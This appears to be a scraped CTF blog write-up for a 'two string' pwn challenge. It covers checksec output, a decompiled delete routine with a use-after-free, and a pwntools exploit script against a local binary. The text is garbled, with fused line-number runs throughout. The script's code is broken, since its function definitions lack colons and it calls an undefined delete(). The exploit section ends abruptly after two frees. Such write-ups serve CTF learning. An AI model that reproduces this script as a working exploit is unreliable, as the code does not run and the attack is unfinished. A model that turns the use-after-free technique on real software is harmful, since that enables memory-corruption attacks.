two string Posted on 2019-08-15 | In 网络信息安全专项赛 0x01 寻找漏洞123456789101112131415161718192021222324252627282930313233343536373839RELRO STACK CANARY NX PIE Partial RELRO Canary found NX enabled No PIE具体步骤在uaf实例 差不多的题目这里直接简单解题漏洞函数int sub_E56(){ int v1; // [rsp+Ch] [rbp-4h] printf("Please input index : "); v1 = sub_BE4(); if ( v1 < 0 && (unsigned int)v1 > 0x1F || !qword_202040[v1] ) return puts("Index error!"); free((void *)*qword_202040[v1]); free(qword_202040[v1]); qword_202040[v1] = 0LL; return puts("Delete success!");}uaf漏洞xfgg@ubuntu:~/Desktop$ ./pwn1. create string2. display string3. delete string4. merge string5. merge strings6. exit>>> 1Please enter the size of string : 2Please enter the string : 1 create string 的结构 struct palyer{ int size; int string;} 0x02 思路分析1234567891011121314151617181920212223242526编写dynelf查看内存结构def create_string(size,string) p.recvuntil(" ") p.sendline("1") p.recvuntil(' of string:') p.sendline(str(size)) p.recvuntil(' the string:') p.sendline (string) def display_string(index) p.recvuntil(" ") p.sendline("2") p.recvuntil(' index:') p.sendline(str(index)) def delete_string(index) p.recvuntil(" ") p.sendline("3") p.recvuntil(' index:') p.sendline(str(index))create_string(32,'aaa')create_string(32,'bbb')delete(1)delete(0) ### free掉创建的两个string 接下来就要构造fake chunk进行攻击 0x03 exp12345678910111213141516171819202122232425262728293031from pwn import *p = process('/home/xfgg/pwn')elf = ELF('/home/xfgg/pwn')def create_string(size,string) p.recvuntil(" ") p.sendline("1") p.recvuntil(' of string:') p.sendline(str(size)) p.recvuntil(' the string:') p.sendline (string) def display_string(index) p.recvuntil(" ") p.sendline("2") p.recvuntil(' index:') p.sendline(str(index)) def delete_string(index) p.recvuntil(" ") p.sendline("3") p.recvuntil(' index:') p.sendline(str(index))create_string(32,'aaa')create_string(32,'bbb')delete(1)delete(0)magic